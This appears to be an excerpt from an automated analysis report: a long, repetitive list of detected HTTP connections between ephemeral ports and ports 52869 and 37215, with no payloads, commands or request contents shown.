                Source: unknownNetwork traffic detected: HTTP traffic on port 50794 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49270 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49278 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57866 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33104 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33106 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50794 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 37690 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 40002 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 41432 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 47268 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33104 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33106 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57866 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49270 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49278 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 40002 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 54588 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 54592 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 47268 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33106 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33104 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60112 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 45084 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58766 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42844 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33086 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 45234 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42854 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33098 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 38650 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 40002 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 56294 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39452 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50794 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42844 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42854 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42604 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 55076 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 47268 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42844 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 45084 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42854 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 45234 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60112 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42604 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39452 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33318 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55076 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42844 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42854 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 45084 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57766 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42604 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33318 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45234 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60952 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39452 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 55076 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60112 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33106 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 48660 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 56666 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33104 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57866 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 41702 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57766 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49270 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49278 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33318 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60952 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35934 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35936 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 40002 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58294 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56666 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42844 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 47268 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42854 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42604 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 41702 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 54206 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57766 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 48922 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60952 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 45084 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 45234 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39056 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 55076 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39452 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33318 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56666 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58294 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48922 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 54206 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 41702 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60112 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39056 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58396 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 44310 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 48922 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35170 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35200 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35706 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60952 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57766 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33784 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33794 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58294 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40710 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39056 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 44310 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 54206 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50794 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50750 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51888 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 56666 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35706 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 40710 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 44310 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42604 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42844 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42854 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50750 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51888 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 59982 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33106 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60004 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35706 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 41702 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 48922 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 45084 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33318 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40710 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51376 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57002 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57006 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51418 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39056 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 45234 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 34120 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 34166 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51888 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50750 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51418 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39452 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 55076 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33104 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 47454 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 32984 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 36356 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 44310 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 32996 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51418 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58396 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 54206 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58294 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47268 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 40002 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 36356 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35706 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51418 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57520 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60952 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60370 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60112 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 40710 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57766 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51888 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50750 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 36356 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42800 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 41240 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57866 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35058 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51376 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 56666 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60370 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49278 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57520 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49270 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35058 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51418 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 48922 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60370 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 47454 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39056 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 44310 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35058 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 36356 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60558 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57520 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 55414 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39334 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 41702 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 38568 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35706 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 55414 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60558 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49186 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50686 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 37886 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42604 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35058 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 38568 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39334 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60370 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 41240 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 40710 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42800 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42844 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42854 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 55414 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49186 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43282 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51888 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50686 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58396 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50750 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 37886 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60558 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33318 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38568 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 54206 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51418 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 47470 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 47476 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57520 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49186 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39334 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50686 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 37886 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58294 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 34570 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60218 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58256 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58136 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 34574 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43282 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55414 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 53304 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 45084 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 53306 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35186 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51376 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 45234 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 55076 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 36356 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39452 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58256 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 59996 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58136 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60558 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 38568 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43282 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35058 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39854 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 37886 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49186 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50686 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 47454 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39868 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 59996 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33106 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58256 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60952 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39334 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50794 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58136 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57766 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60370 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 59996 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51290 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 44310 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49278 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 56666 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49270 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60218 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 55414 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 41240 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42800 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33104 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 48922 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58256 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39056 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 59378 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43282 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60112 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35548 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 47268 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 53920 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 53924 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35706 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 59996 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 54786 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 53920 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 54788 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 54786
                Source: unknownNetwork traffic detected: HTTP traffic on port 53924 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 54788
                Source: unknownNetwork traffic detected: HTTP traffic on port 42692 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 59378 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57520 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58136 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 40002 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 38568 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42698 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 42692
                Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 42698
                Source: unknownNetwork traffic detected: HTTP traffic on port 35548 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 53920 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 37886 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60558 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 53924 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50686 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49186 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 59378 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51418 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 40710 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43104 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51290 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51888 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50750 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35548 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 53920 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50270 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 38886 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 53924 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33818 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33826 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 32844 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 41702 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43692 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35182 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35184 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 38098 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35166 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43708 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35182 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35184 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43104 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59378 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 55298 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50270 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39334 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 38886 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35182 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35184 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 32844 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35058 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 38098 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35166 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43692 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60582 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60588 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43708 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 36356 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 55298 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 33274 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 56410 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33280 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 53924 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35548 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 53920 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60218 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35182 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35184 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58256 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58396 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 38098 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35166 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 32844 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 59996 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51758 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43104 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50270 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51762 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 55298 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38886 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 56410 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43692 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 45150 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 43708 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43294 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 36678 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43404 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 36684 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 56288 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 56410 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 54206 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 45150 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35182 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35184 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43282 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58136 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 38098 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51376 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35166 -> 52869
